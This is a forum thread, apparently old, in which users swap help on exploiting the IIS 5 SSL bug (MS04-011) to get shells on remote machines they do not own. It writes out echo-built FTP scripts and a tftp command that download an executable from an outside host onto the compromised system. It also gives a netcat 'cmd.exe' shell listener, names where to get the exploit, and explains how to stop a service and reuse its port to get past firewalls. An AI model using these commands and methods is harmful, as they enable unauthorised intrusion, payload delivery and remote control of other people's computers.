Has anyone managed to exploit any machines with the IIS 5 SSL bug and use FTP.exe? I've managed to get about a dozen shells so far but I can't get FTP.exe to work for a single one of them. I've tried to connect to about three different FTP servers but all of them hang when it starts to transfer. Has anyone managed to get this to work? And if so, could you please post your "echo" text?

Here's what I'm using at the moment:

echo open xx.xx.xx.xx 1050 > c:\f2p.txt
echo user leech >> c:\f2p.txt
echo l33ch >> c:\f2p.txt
echo type binary >> c:\f2p.txt
echo get filename.exe >> c:\f2p.txt
echo quit >> c:\f2p.txt

ftp -v -n -s:c:\f2p.txt

Thanks for any help.

Well.. i havn't used ftp yet... coz TFTP works fine for me.

But here's the code I would use:

psykotikpenguin:

Can You tell us which exploit (compiled by who) do You use and what OS are You running??

Thank You

have you tried having them connect to another ftp?, maybe the one you are trying is having problems

exploit in use in discussion would be "Microsoft IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)" and was posted in http://www.governmentsecurity.org/forum/in...?showtopic=7934 by gurou (maybe more places)... (compiled version isn't in that one, just source)

yeah, try out a different ftp client.. i didn't try ftp with it, but the problem deffinitly sounds like a software problem if other clients work fine with it...

Thanks for your help guys. I'm using Windows XP and the second reverse connection THC exploit. I've already tried about three different FTP servers (all of them are Serv-U based though -- I'll try a different kind of server later on tonight.) Tweakz20, I only have access to a default shell so I don't think I can use any other FTP clients. I don't think there are any other FTP programs built into windows by default aside from FTP.exe.

Well U have got farther than me then hehe. I havent even seen a shell yet. Testing over my network now to see whats up. Tried both versions today.

tftp slow but always good 2 incase

tftp -i ip get file.bat c:\file.bat

how use THCIISSlame.exe exploit????
anybody can help me??
my ISP is block all port, and allow only port 21, 23, 53, 80, 443... how can i use this exploit????
i've try THC.exe blah.com 202.25.223.2 53
...
..
..
waiting for shell...

and when i open other cmd shell and type

nc.exe -l -p 53 -e cmd.exe -vv
...
...
no shell.....

help me please...

I scanned port 80 and test the exploit, but i don´t get a shell!
Is port 80 the right port?
t00sTr0nG

no i think it's port 443!

of course it's 443 ssl is default set 2 443

i've tried alot of machines, all stop at "waiting for shell"

pls dont talk about how the exploit works.u can discuss it in the exploit specific topics,but not here.

thank u very much

If it takes to long to transfer a file a shell could crash yeah.
btw, a shell can always stop whenever it wants.

I cannot image ftp.exe not working, I just think your shell just stops everytime. Maybe it has something to do with the connection to the server.

I have the same problem with this sploit... If I try to FTP it connects and asks for user upon entering it never prompts for pass.. And if I try to ADD a user shell crashes...WTF? And where the hell is this VB script I been looking everywhere.
Try tftp, it werks... But not very anonymous...

I've finally got it to work on some anonymous pub somewhere. I guess the problem was just with Serv-U based FTPs...

I've got a little problem....when i send the exploit it gave to me a bind error 10048....Someone know what does it mean?

Anyone got this ftp transfer working?
I have same probs like many other guy with ftp. Hmm but tftp is working...

sometimes it work, sometimes not

i would to tracert a route to the ftp, perhaps you see the problem

"tracert 208.x.x.x"

or you take a another methode to transfer the files ... look into the board ( ... to get a file from a webserver ... )

greets
labbertasche

omg dudes,

IT is known that iis 5.0 sploit gives many internal ip results

that means its in a network

which means the sysadmin didnt routed the "ftp" transfer ports

which means you can NEVER ... never ever ever ever... ever EVER transfer files on it WITH FTP.exe

with tftp.exe it IS possible in many cases.
but also not allways.
b/c tftp uses other protocol.


hope this helps.

For the people that still can't find the .vbs script ...
http://www.governmentsecurity.org/forum/in...?showtopic=4649

have fun, and never ask again

Thanks alot man, needed it

I don't knew if this has much to do with this topic but .. i tryed the exploit recently released for framwork , from metasploit.com ,and i didn't got any reslts ... does anyone uses this exploit 2 ?

Best Regards

that metasploit includes extra offsets so should work alot better, i've had a fair few shells with this but the problem being when u run ur program it will listen on the internal network, i'm guessing to overcome this you can do two things, close all av/firewall software, secondly close a service already open try that port... try the following ports, 21,25,110,53

21, ftp port
25, smtp port
110, smtp port
53, dns port

also remember if ICF is running close it.. very important this as it will block your connection... Other than that .. ideas up to u lot how to get your ftp client or whatever ur doing to work..

I'm going to test some other ftp clients later on my test machine i have locally... see what results i get..

Well .. I have no firewalls ... and no AV's ... i have my system updated .. with all recent ms patches . I have my internet connection trough pppoe doe .. could this be a problem ? How can i resolve it .. I also got a problem from THCiis .. is like .. i attacked one IP and got failed .. i gvae it to a friend of myne and he got shell in no time . I tryed again and again but with no succes .. on a shure target .
You sad something i didn;t quite understand :

if u close some of these service and install your service @ the same port to bypass the router it will be noticed soon....
And it will be cleaned up

ive successfully used ftp to get some files i don't understand why everyones have so much trouble i didn't notice anything different about it other than when i was echoing it was telling me that i had an invalid character in the username so i just got rid of the space between the username and the >> whatever.txt for example,

username>> whatever.txt instead of it username >> whatever.txt and i did the same with the password just as a precaution

had the same problem but if you check the open ports and then stop service on a one of the port and use it for your ftp, it will work fine, ports 21 and 23 works almos all the time for me..